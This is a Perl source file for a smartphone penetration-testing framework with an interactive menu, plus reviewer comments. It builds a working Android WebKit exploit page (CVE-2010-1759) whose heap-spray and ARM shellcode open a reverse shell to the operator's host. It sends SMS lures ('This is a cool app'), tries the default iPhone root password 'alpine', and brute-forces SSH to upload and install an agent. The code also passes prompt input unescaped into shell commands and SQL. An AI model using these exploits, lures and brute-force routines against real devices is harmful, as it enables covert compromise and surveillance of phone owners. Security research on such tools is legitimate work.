#!/usr/bin/perl
use DBI;
use Cwd;
use Expect;
use IO::Socket;
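# Framework version shown in the start-up banner.
$version = "0.1.1";
# Settings file, resolved against the current working directory.  It holds
# the database credentials (MYSQLUSER / MYSQLPASS), so it should be readable
# by the operator account only.
$configfile = "config";
# Parse "NAME = value" lines into the package-global %Variables hash that the
# subs in this script read.  The three-argument open keeps the file name from
# being parsed as part of the mode.  The "+<" mode and the bareword CONFIG
# handle (never closed here) are kept as they were.
# NOTE(review): everything after the first "#" on a line is dropped, so a
# value that itself contains "#" (a password, for example) is truncated.
if (open(CONFIG, "+<", $configfile))
{
    while (<CONFIG>)
    {
        chomp;
        s/#.*//;
        s/^\s+//;
        s/\s+$//;
        # Blank and comment-only lines used to create an entry with an empty key.
        next if $_ eq "";
        ($var, $value) = split(/\s*=\s*/, $_, 2);
        $Variables{$var} = ${value};
    }
}
else
{
    # The script used to continue silently with an empty configuration.
    warn "Cannot open $configfile: $!\n";
}
$Variables{"OS"} = $^O;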
# Start-up banner.  One print call; the bytes written are the same as the
# eight separate print statements produced (seven lines, then two blank ones).
print join("\n",
    "################################################",
    "# #",
    "# Welcome to the Smartphone Pentest Framework! #",
    "# v" . $version . " #",
    "# Georgia Weidman/Bulb Security #",
    "# #",
    "################################################",
    "",
    "",
    "");
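# Main menu loop: print the options, read one line from standard input and
# call the matching handler sub.
#
# The choice is compared as a string.  The original numeric comparison
# ($choice == "exit") is true for every non-numeric input, because any such
# string has the numeric value 0, so an empty line or a typo terminated the
# program.  Only "0", "exit" or end of input leave the loop now.
while (1)
{
    print "Select An Option from the Menu:\n\n";
    print "\t1.) Attach Framework to a Deployed Agent\n";
    print "\t2.) Send Commands to an Agent\n";
    print "\t3.) View Information Gathered\n";
    print "\t4.) Attach Framework to a Mobile Modem\n";
    print "\t5.) Run a remote attack\n";
    print "\t6.) Run a social engineering or client side attack\n";
    print "\t7.) Clear/Create Database\n";
    print "\t0.) Exit\n";
    print "\n\n";
    print "spf>";
    $choice = <>;
    # End of input (closed stdin): leave instead of redrawing the menu forever.
    exit() unless defined $choice;
    chomp($choice);
    $choice =~ s/^\s+//;
    $choice =~ s/\s+$//;
    if (($choice eq "0") || (lc($choice) eq "exit"))
    {
        exit();
    }
    elsif ($choice eq "1")
    {
        agent_attach();
    }
    elsif ($choice eq "2")
    {
        agent_control();
    }
    elsif ($choice eq "3")
    {
        view_data();
    }
    elsif ($choice eq "4")
    {
        add_modem();
    }
    elsif ($choice eq "5")
    {
        remote_attack();
    }
    elsif ($choice eq "6")
    {
        social();
    }
    elsif ($choice eq "7")
    {
        database_clear();
    }
    else
    {
        print "Unknown option. Enter a number from the menu.\n\n";
    }
}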
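# database_clear: after a y/N confirmation, drop and recreate the five tables
# of the "framework" database (agents, data, modems, remote, client).
#
# Reads MYSQLSERVER, MYSQLUSER, MYSQLPASS, MYSQLPORT and DATABASETYPE from
# %Variables.  The connection settings and $dbh stay package globals because
# other subs in this file read them without assigning them first.
# Takes no arguments and returns nothing useful.
sub database_clear()
{
    print "This will destroy all your data. Are you sure you want to? (y/N)?";
    $yes = <>;
    return unless defined $yes;
    chomp($yes);
    return unless lc($yes) eq "y";

    $sqlserver = $Variables{"MYSQLSERVER"};
    $username = $Variables{"MYSQLUSER"};
    $password = $Variables{"MYSQLPASS"};
    $port = $Variables{"MYSQLPORT"};
    $type = $Variables{"DATABASETYPE"};

    # Only the auto-increment id column differs between the two back ends.
    my $id_column;
    if ($type eq "postgres")
    {
        $id_column = "id SERIAL NOT NULL PRIMARY KEY";
        $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver", $username, $password);
    }
    elsif ($type eq "mysql")
    {
        $id_column = "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY";
        $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username, $password);
        if (! defined $dbh)
        {
            print "Database doesn't exist. Creating it\n";
            # List form: no shell is involved, so characters in the user name
            # or password cannot be interpreted as shell syntax.
            # NOTE(review): the password is still passed as a command-line
            # argument and is visible in the process list while mysqladmin runs.
            system("mysqladmin", "-u", $username, "create", "framework", "-p" . $password);
            $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username, $password);
        }
    }
    else
    {
        # Previously this fell through and used whatever $dbh an earlier sub
        # had left behind, or died on an undefined handle.
        print "Unknown DATABASETYPE in config; nothing was changed\n";
        return;
    }
    unless (defined $dbh)
    {
        print "Could not connect to the database; nothing was changed\n";
        return;
    }

    my @statements = (
        "DROP TABLE IF EXISTS agents",
        "DROP TABLE IF EXISTS data",
        "DROP TABLE IF EXISTS modems",
        "DROP TABLE IF EXISTS remote",
        "DROP TABLE IF EXISTS client",
        "create table agents ($id_column, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))",
        "create table data ($id_column, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))",
        "create table modems ($id_column, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))",
        "create table remote ($id_column, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))",
        "create table client ($id_column, number varchar(12), exploit varchar(200), vuln varchar(3))",
    );
    for my $statement (@statements)
    {
        # Keep going after a failure, as the original did, but say which
        # statement failed.
        $dbh->do($statement) or print "Statement failed: $statement\n";
    }
    return;
}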
# social: sub-menu behind option 6 of the main menu.  Choice 1 hands over to
# direct_download(), choice 2 to client_side(); both end the menu afterwards.
# Input whose numeric value is 0 returns to the caller.  That includes "0",
# "exit" and any other non-numeric text, because the comparison is numeric.
# The three settings are copied into package globals as before.
sub social
{
    $webserver = $Variables{"WEBSERVER"};
    $sqlserver = $Variables{"MYSQLSERVER"};
    $ipaddress = $Variables{"IPADDRESS"};
    for (;;)
    {
        print "\n\nChoose a social engineering or client side attack to launch:\n",
              "\t1.) Direct Download Agent\n",
              "\t2.) Client Side Shell\n",
              "spf>";
        $choice1 = <>;
        chomp($choice1);
        if ($choice1 == 1)
        {
            direct_download();
            last;
        }
        elsif ($choice1 == 2)
        {
            client_side();
            last;
        }
        return if ($choice1 == "exit") || ($choice1 == 0);
    }
}
# client_side: interactive module behind option 2 of the social() menu.
# For menu choice 1 it prompts for a hosting path, a file name and a phone
# number, writes a fixed HTML/JavaScript page to WEBSERVER . path . filename,
# writes a "SEND" command containing the page's URL into the selected modem's
# "getfunc" file, waits up to 180 seconds for an inbound TCP connection on
# SHELLIPADDRESS:12345, and records the outcome in the "client" table.
# Every variable here is a package global; the sub takes no arguments.
sub client_side
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
$shellipaddress = $Variables{"SHELLIPADDRESS"};
while(1)
{
print "Select a Client Side Attack to Run\n";
print "\t1) CVE=2010-1759 Webkit Vuln Android\n";
print "spf>";
# Not chomped; compared numerically below, so "exit" and any other
# non-numeric text count as 0 and return to the caller.
$choice1 = <>;
if (($choice1 == "exit") || ($choice1 == 0))
{
return;
}
if ($choice1 == 1)
{
print "Hosting Path:";
$path = <>;
print "Filename:";
$filename = <>;
print "Phone Number to Attack:";
$number = <>;
chomp($number);
# $platform is not assigned in this sub; this chomps whatever value an
# earlier sub left in the global.
chomp($platform);
chomp($path);
chomp($filename);
$link = "http://" . $ipaddress . $path . $filename;
$fullpath = $webserver. $path;
# NOTE(review): $path and $filename come straight from the prompt and are
# concatenated into command strings run through one-argument system()
# (mkdir, touch, chmod below), so shell metacharacters in them are
# interpreted by the shell.
$command1 = "mkdir " . $fullpath;
system($command1);
# Split SHELLIPADDRESS into its four octets and hex-encode each one.
$ipaddresscopy = $shellipaddress;
@octets = split(/\./, $ipaddresscopy);
$out1 = pack "c", @octets[0];
$hex1 = unpack "H2" , $out1;
$out2 = pack "c", @octets[1];
$hex2 = unpack "H2" , $out2;
$out3 = pack "c", @octets[2];
$hex3 = unpack "H2" , $out3;
$out4 = pack "c", @octets[3];
$hex4 = unpack "H2" , $out4;
$sploitfile = $webserver . $path . $filename;
$command8 = "touch " . $sploitfile;
system($command8);
# chmod 777 leaves the generated file world-writable.
$command9 = "chmod 777 " . $sploitfile;
system($command9);
# Two-argument open; the result is not checked.
open(SPLOITFILE, ">$sploitfile");
print SPLOITFILE "<html>\n";
print SPLOITFILE "<head>\n";
print SPLOITFILE "<script>\n";
# The hex-encoded octets computed above are embedded in the page here.
print SPLOITFILE "var ip = unescape(\"\\u" . $hex2 . $hex1 . "\\u" . $hex4 . $hex3 . "\");\n";
print SPLOITFILE "var port = unescape(\"\\u3930\");\n";
print SPLOITFILE "function trigger()\n";
print SPLOITFILE "{\n";
print SPLOITFILE "var span = document.createElement(\"div\");\n";
print SPLOITFILE "document.getElementById(\"BodyID\").appendChild(span);\n";
print SPLOITFILE "span.innerHTML = -parseFloat(\"NAN(ffffe00572c60)\");\n";
print SPLOITFILE "}\n";
print SPLOITFILE "function exploit()\n";
print SPLOITFILE "{\n";
print SPLOITFILE "var nop = unescape(\"\\u33bc\\u0057\");\n";
print SPLOITFILE "do\n";
print SPLOITFILE "{\n";
print SPLOITFILE "nop+=nop;\n";
print SPLOITFILE "} while (nop.length<=0x1000);\n";
print SPLOITFILE "var scode = nop+unescape(\"\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002\");\n";
print SPLOITFILE "scode += port;\n";
print SPLOITFILE "scode += ip;\n";
print SPLOITFILE "scode += unescape(\"\\u2000\\u2000\");\n";
print SPLOITFILE "target = new Array();\n";
print SPLOITFILE "for(i = 0; i < 0x1000; i++)\n";
print SPLOITFILE "target[i] = scode;\n";
print SPLOITFILE "for (i = 0; i <= 0x1000; i++)\n";
print SPLOITFILE "{\n";
print SPLOITFILE "document.write(target[i]+\"<i>\");\n";
print SPLOITFILE "if (i>0x999)\n";
print SPLOITFILE "{\n";
print SPLOITFILE "trigger();\n";
print SPLOITFILE "}\n";
print SPLOITFILE "}\n";
print SPLOITFILE "}\n";
print SPLOITFILE "</script>\n";
print SPLOITFILE "</head>\n";
print SPLOITFILE "<body id=\"BodyID\">\n";
print SPLOITFILE "Enjoy!\n";
print SPLOITFILE "<script>\n";
print SPLOITFILE "exploit();\n";
print SPLOITFILE "</script>\n";
print SPLOITFILE "</body>\n";
print SPLOITFILE "</html>\n";
close(SPLOITFILE);
# get_modem() returns 0 when no modem is registered; in that case only the
# message is printed and the menu loop starts over.
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
# $dbh is not checked after connect; a failed connection ends in a method
# call on an undefined value at the first prepare().
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
}
# NOTE(review): $modem is concatenated into the SQL text instead of being
# passed as a bind value.
$pathquery = "SELECT path from modems where id=" . $modem;
$sql = $dbh->prepare($pathquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$path2 = @rows[0];
$keyquery = "SELECT controlkey from modems where id=" . $modem;
$sql = $dbh->prepare($keyquery);
$results2 = $sql->execute;
@rows = $sql->fetchrow_array();
$key2 = @rows[0];
# Overwrite the modem's "getfunc" file with "<key> SEND <number> <text>".
# Two-argument open; the result is not checked.
$control = $webserver . $path2 . "/getfunc";
open(CONTROLFILE, ">$control");
$command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool page: " . $link;
print CONTROLFILE $command2;
close(CONTROLFILE);
$vulnerable = "no";
# $socket is not checked before accept(); if the listener could not be
# created this is a method call on an undefined value.
$socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
if ($data_socket = $socket->accept())
{
$data="/system/bin/id\n";
print $data_socket $data;
$data=<$data_socket>;
print $data;
close($data_socket);
$vulnerable = "yes";
}
print "\nVulnerable: " . $vulnerable . "\n\n";
# Record the result.  The connection settings are read again and a second
# database connection is opened.
$table = "client";
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
# NOTE(review): the values are wrapped in quotes by hand and concatenated
# into the INSERT; nothing escapes a quote character inside $number.
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
$number2 = "\'" . $number . "\'";
$vulnerable2 = "\'" . $vulnerable . "\'";
$webkit = "\'" . "webkit" . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$number2 = "\"" . $number . "\"";
$vulnerable2 = "\"" . $vulnerable . "\"";
$webkit = "\"" . "webkit" . "\"";
}
$insertquery = "INSERT INTO $table (id,number,exploit,vuln) VALUES (DEFAULT,$number2,$webkit,$vulnerable2)";
$sql = $dbh->prepare($insertquery);
$sql->execute;
last;
}
}
}
}
# direct_download: interactive module behind option 1 of the social() menu.
# Prompts for platform, hosting path, file name and phone number.  Only the
# "android" platform is handled: the file named by ANDROIDAGENT is copied to
# WEBSERVER . path . filename and a "SEND" command containing the download URL
# is written to the selected modem's "getfunc" file.
# For any other platform, or when get_modem() returns 0, the loop prompts
# again; there is no exit path other than a completed send.
# Every variable here is a package global; the sub takes no arguments.
sub direct_download
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "This module sends an SMS with a link to directly download and install an Agent\n";
print "Platform(Android/iPhone/Blackberry):";
$platform = <>;
print "Hosting Path:";
$path = <>;
print "Filename:";
$filename = <>;
print "Phone Number to Attack:";
$number = <>;
chomp($number);
chomp($platform);
chomp($path);
chomp($filename);
if (lc($platform) eq "android")
{
$link = "http://" . $ipaddress . $path . $filename;
$fullpath = $webserver. $path;
# NOTE(review): $path and $filename come straight from the prompt and are
# concatenated into command strings run through one-argument system()
# (mkdir and cp below), so shell metacharacters in them are interpreted by
# the shell.  Neither command's exit status is checked.
$command1 = "mkdir " . $fullpath;
system($command1);
$location = $Variables{"ANDROIDAGENT"};
$command = "cp " . $location . " " . $webserver . $path . $filename;
system($command);
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
# $dbh is not checked after connect.
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
}
# NOTE(review): $modem is concatenated into the SQL text instead of being
# passed as a bind value.
$pathquery = "SELECT path from modems where id=" . $modem;
$sql = $dbh->prepare($pathquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$path2 = @rows[0];
$keyquery = "SELECT controlkey from modems where id=" . $modem;
$sql = $dbh->prepare($keyquery);
$results2 = $sql->execute;
@rows = $sql->fetchrow_array();
$key2 = @rows[0];
# Overwrite the modem's "getfunc" file with "<key> SEND <number> <text>".
# Two-argument open; the result is not checked.
$control = $webserver . $path2 . "/getfunc";
open(CONTROLFILE, ">$control");
$command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool app: " . $link;
print CONTROLFILE $command2;
close(CONTROLFILE);
last;
}
}
}
}
# remote_attack: sub-menu behind option 5 of the main menu.  Choice 1 calls
# alpine(), choice 2 calls sshguess(); the menu is shown again after either
# returns.  Input whose numeric value is 0 ("0", "exit", or any other
# non-numeric text) returns to the caller.
sub remote_attack
{
    $webserver = $Variables{"WEBSERVER"};
    $sqlserver = $Variables{"MYSQLSERVER"};
    while (1)
    {
        print "\n\nChoose a remote attack to launch:\n",
              "\t1.) Test for Default SSH Password (iPhone)\n",
              "\t2.) Guess SSH Password (iPhone)\n",
              "spf>";
        $choice1 = <>;
        chomp($choice1);
        alpine()   if $choice1 == 1;
        sshguess() if $choice1 == 2;
        return if ($choice1 == "exit") || ($choice1 == 0);
    }
}
# sshguess: prompt for an IP address and a password-list file, echo both back
# for confirmation, and call guesspass() once the operator answers "y".
# Any other answer repeats the prompts.  $passfile is passed on without being
# chomped, exactly as read.
sub sshguess
{
    $webserver = $Variables{"WEBSERVER"};
    $sqlserver = $Variables{"MYSQLSERVER"};
    while (1)
    {
        print "This module attempts to guess the password for an Jailbroken iPhone on the local network by reading from a supplied password list\n";
        print "IP address:";
        $ipaddress = <>;
        chomp($ipaddress);
        print "Password file:";
        $passfile = <>;
        print "\n\nIP Address:" . $ipaddress . "\nPassword file:" . $passfile . "\nIs this correct?(y/N):";
        $correct = <>;
        chomp($correct);
        next unless lc($correct) eq "y";
        guesspass($ipaddress, $passfile);
        last;
    }
}
# guesspass(ipaddress, passfile): called by sshguess().  Reads passfile line
# by line and drives an sftp session (through Expect) as root@ipaddress with
# each line as the password.  On the first line that reaches an "sftp>" prompt
# it uploads the file named by IPHONEAGENT, opens an ssh session, runs the
# install command and stops reading.  The outcome is written to the "remote"
# table.  Every variable here is a package global.
sub guesspass
{
$ipaddress = $_[0];
$passfile = $_[1];
$vulnerable = "no";
$agent = "no";
$command = 'sftp';
$param = "root@" . $ipaddress;
$timeout = 10;
# $notfound is built but not used in this sub.
$notfound = "ssh: connect to host " . $ipaddress . " port 22: Connection refused";
# $parm is not assigned anywhere in this sub.
$passwordstring = $parm . "'s password: ";
$location = $Variables{"IPHONEAGENT"};
$putfile = $location;
$connectstring = "Connecting to " . $ipaddress . "...";
$installcommand = "dpkg -i " . "iphone.deb" . "\n";
$guesspassword = "null";
# Two-argument open in read/write mode ("+<"); the file is only read below
# and the result of open is not checked.
open(READFILE, "+<$passfile");
while(<READFILE>)
{
$guess = $_;
$guess2 = $guess . "\n";
$exp = Expect->spawn($command, $param) or die "Cannot spawm sftp command";
$exp->expect($timeout,[$connectstring]);
# Answers "yes" to the unknown-host-key prompt, so the remote host key is
# accepted without verification.
$exp->expect($timeout,["Are you sure you want to continue connecting (yes/no)?", sub {my $self = shift; $self->send("yes\n");}]); #[$notfound, return]);
$exp->expect($timeout, $passwordstring);
$exp->send($guess2);
if ($exp->expect($timeout, ["sftp>"]))
{
$vulnerable="yes";
print "PASSWORD FOUND: " . $guess . "\n";
$guesspassword = $guess;
$exp->send("put $putfile\n");
$exp->expect($timeout, ["sftp>"]);
$exp->send("bye\n");
$command2 = "ssh";
$exp = Expect->spawn($command2, $param);
$exp->expect($timeout, $passwordstring);
$exp->send($guess2);
$exp->expect($timeout, [qr'root\s*']);
$exp->send($installcommand);
$exp->expect($timeout, "Setting up com.bulbsecurity.tooltest (0.0.1-23) ...");
$exp->send("tooltest\n");
if($exp->expect($timeout,["Smartphone Pentest Framework Agent"]))
{
$agent="yes";
}
$exp->send("exit");
$exp->soft_close();
last;
}
}
print "\nVulnerable: " . $vulnerable . "\nAgent: " . $agent;
# Record the result.
# NOTE(review): the matched password is stored in clear text in the
# "exploit" column ("Guess: ..."), and every value is wrapped in quotes by
# hand and concatenated into the INSERT.  A quote character in a password-list
# line or in $ipaddress changes the statement.  $dbh is not checked.
$table = "remote";
$guessstring = "Guess: " . $guesspassword;
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
$ip2 = "\'" . $ipaddress . "\'";
$vulnerable2 = "\'" . $vulnerable . "\'";
$agent2 = "\'" . $agent . "\'";
$exploit = "\'" . $guessstring . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$ip2 = "\"" . $ipaddress . "\"";
$vulnerable2 = "\"" . $vulnerable . "\"";
$agent2 = "\"" . $agent . "\"";
$exploit = "\"" . $guessstring . "\"";
}
$insertquery = "INSERT INTO $table (id,ip,exploit,vuln,agent) VALUES (DEFAULT,$ip2,$exploit,$vulnerable2,$agent2)";
$sql = $dbh->prepare($insertquery);
$sql->execute;
}
# alpine: interactive module behind option 1 of the remote_attack() menu.
# Prompts for an IP address and, once confirmed with "y", drives an sftp and
# then an ssh session (through Expect) as root@ipaddress, sending the fixed
# password "alpine" to each.  It uploads the file named by IPHONEAGENT, runs
# the install command and writes the outcome to the "remote" table.
# Any answer other than "y" repeats the prompts.
# Every variable here is a package global; the sub takes no arguments.
sub alpine
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
while(1)
{
print "This module tests for an Jailbroken iPhone with a default password on the local network\n";
print "IP address:";
$ipaddress = <>;
chomp($ipaddress);
print "\n\nIP Address:" . $ipaddress . "\nIs this correct?(y/N):";
$correct = <>;
chomp($correct);
if (lc($correct) eq "y")
{
$vulnerable = "no";
$agent = "no";
$command = 'sftp';
$param = "root@" . $ipaddress;
$timeout = 10;
# $notfound is built but not used in this sub.
$notfound = "ssh: connect to host " . $ipaddress . " port 22: Connection refused";
# $parm is not assigned anywhere in this sub.
$passwordstring = $parm . "'s password: ";
$location = $Variables{"IPHONEAGENT"};
$putfile = $location;
$connectstring = "Connecting to " . $ipaddress . "...";
$installcommand = "dpkg -i " . "iphone.deb" . "\n";
$exp = Expect->spawn($command, $param) or die "Cannot spawm sftp command";
$exp->expect($timeout,[$connectstring]);
# Answers "yes" to the unknown-host-key prompt, so the remote host key is
# accepted without verification.
$exp->expect($timeout,["Are you sure you want to continue connecting (yes/no)?", sub {my $self = shift; $self->send("yes\n");}]); #[$notfound, return]);
$exp->expect($timeout, $passwordstring);
$exp->send("alpine\n");
if ($exp->expect($timeout, ["sftp>"]))
{
$vulnerable="yes";
print "Vulnerable\n";
}
# The statements from here to soft_close() run whether or not the "sftp>"
# prompt was seen above.
$exp->send("put $putfile\n");
$exp->expect($timeout, ["sftp>"]);
$exp->send("bye\n");
$command2 = "ssh";
$exp = Expect->spawn($command2, $param);
$exp->expect($timeout, $passwordstring);
$exp->send("alpine\n");
$exp->expect($timeout, [qr'root\s*']);
#$installcommand = "dpkg -i com.bulbsecurity.tooltest_0.0.1-23_iphoneos-arm.deb\n";
$exp->send($installcommand);
$exp->expect($timeout, "Setting up com.bulbsecurity.tooltest (0.0.1-23) ...");
$exp->send("tooltest\n");
if($exp->expect($timeout,["Smartphone Pentest Framework Agent"]))
{
$agent="yes";
}
$exp->send("exit");
$exp->soft_close();
print "\nVulnerable: " . $vulnerable . "\nAgent: " . $agent;
# Record the result.
# NOTE(review): every value is wrapped in quotes by hand and concatenated
# into the INSERT; a quote character in $ipaddress changes the statement.
# $dbh is not checked after connect.
$table = "remote";
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
$ip2 = "\'" . $ipaddress . "\'";
$vulnerable2 = "\'" . $vulnerable . "\'";
$agent2 = "\'" . $agent . "\'";
$alpine = "\'" . "alpine" . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$ip2 = "\"" . $ipaddress . "\"";
$vulnerable2 = "\"" . $vulnerable . "\"";
$agent2 = "\"" . $agent . "\"";
$alpine = "\"" . "alpine" . "\"";
}
$insertquery = "INSERT INTO $table (id,ip,exploit,vuln,agent) VALUES (DEFAULT,$ip2,$alpine,$vulnerable2,$agent2)";
$sql = $dbh->prepare($insertquery);
$sql->execute;
last;
}
}
}
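# get_modem: return the id of the modem row to use.
#
# Returns 0 when the "modems" table is empty (callers treat 0 as "no modem"),
# 1 when it holds exactly one row, and otherwise lists the rows and returns
# the number the operator picks.  Entering 0 at the prompt still returns 0.
#
# Callers concatenate the return value into SQL text, so the answer is now
# validated as a whole number in 0..row count before it is returned; the
# original returned the raw input line, trailing newline included, whenever
# its numeric value was <= the row count.  A failed connection or end of
# input returns 0 instead of dying or looping.
# NOTE(review): ids are assumed to run 1..COUNT(*) without gaps, as before.
# The connection settings and $dbh stay package globals because other subs in
# this file read them.
sub get_modem
{
    $sqlserver = $Variables{"MYSQLSERVER"};
    while (1)
    {
        $username = $Variables{"MYSQLUSER"};
        $password = $Variables{"MYSQLPASS"};
        $port = $Variables{"MYSQLPORT"};
        $type = $Variables{"DATABASETYPE"};
        # Do not reuse a handle left behind by another sub when DATABASETYPE
        # matches neither branch.
        $dbh = undef;
        if ($type eq "postgres")
        {
            $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver", $username, $password);
        }
        elsif ($type eq "mysql")
        {
            $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username, $password);
        }
        unless (defined $dbh)
        {
            print "\nCould not connect to the database\n";
            return 0;
        }

        ($row) = $dbh->selectrow_array("SELECT COUNT(*) from modems");
        # An empty table and a failed query both mean "no modem".
        return 0 unless $row;
        return 1 if $row == 1;

        print "\n\nAvailable Modems:\n\n";
        # One prepared statement, with the id passed as a bind value.
        $sql = $dbh->prepare("SELECT number from modems where id=?");
        return 0 unless defined $sql;
        for ($i = 1; $i <= $row; $i++)
        {
            $sql->execute($i);
            ($r) = $sql->fetchrow_array();
            $sql->finish;
            print "\t" . $i . ".) " . $r . "\n";
        }
        print "\nSelect a modem to interact with\n";
        print "\nspf>";
        $chosenmodem = <>;
        # End of input: give up instead of prompting forever.
        return 0 unless defined $chosenmodem;
        chomp($chosenmodem);
        $chosenmodem =~ s/^\s+//;
        $chosenmodem =~ s/\s+$//;
        if ($chosenmodem =~ /\A[0-9]+\z/ && $chosenmodem <= $row)
        {
            return $chosenmodem + 0;
        }
    }
}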
# add_modem: sub-menu behind option 4 of the main menu.  Choice 1 reports
# whether /dev/ttyUSB2 exists and, if it does, opens it on the TTY handle;
# choice 2 calls app_connect().  Both end the menu.  Any other input shows the
# menu again.  $choice is the same package global the main menu uses.
sub add_modem
{
    $webserver = $Variables{"WEBSERVER"};
    $sqlserver = $Variables{"MYSQLSERVER"};
    $ipaddress = $Variables{"IPADDRESS"};
    while (1)
    {
        print "\n\nChoose a type of modem to attach to:\n",
              "\t1.) Search for attached modem\n",
              "\t2.) Attach to a smartphone based app\n",
              "spf>";
        $choice = <>;
        if ($choice == 1)
        {
            if (-e "/dev/ttyUSB2")
            {
                print "USB Modem Found\n";
                # Result of open is not checked, as before.
                open(TTY, "+</dev/ttyUSB2");
            }
            else
            {
                print "No USB Modem Found\n";
            }
            last;
        }
        if ($choice == 2)
        {
            app_connect();
            last;
        }
    }
}
# app_connect: prompt for a phone number, control key and URL path, and after
# a "y" confirmation create the web-side files (make_files2), wait for the
# app to check in (handshake), store the modem row (database_add2) and start
# "perl poller.pl <path> <key> > log" in a forked child.
# Any answer other than "y" repeats the prompts.
# Every variable here is a package global.
sub app_connect
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "\nConnect to a smartphone management app. You will need to supply the phone number,the control key, and the URL path\n\n";
print "Phone Number:";
$number = <>;
print "Control Key:";
$key = <>;
print "App URL Path:";
$path = <>;
# The values still carry their trailing newlines here, which is what
# separates the fields in the confirmation text.
print "\n\nPhone Number: " . $number . "Control Key: " . $key . "URL Path: " . $path . "Is this correct?(y/N):";
$correct = <>;
chomp($number);
chomp($path);
chomp($key);
chomp($correct);
if (lc($correct) eq "y")
{
# Overwrites the global set above with this sub's first argument; add_modem
# calls app_connect() with no arguments, so the value is then undefined.
# make_files2 and handshake read WEBSERVER from %Variables themselves.
$webserver = $_[0];
make_files2($path);
handshake($path,$key);
$modemtype = "app";
database_add2($number,$path,$key,$modemtype);
# NOTE(review): $path and $key come straight from the prompt and are
# concatenated into a command string that exec() hands to the shell (the
# "> log" redirection requires one), so shell metacharacters in them are
# interpreted by the shell.
$startcommand = "perl poller.pl " . $path . " " . $key . " > log";
$pid = fork;
die "fork failed" unless defined $pid;
if ($pid ==0)
{
# If exec fails, the child falls through to "last" and returns into the
# menus alongside the parent; there is no exit after it.
exec($startcommand);
}
last;
}
}
}
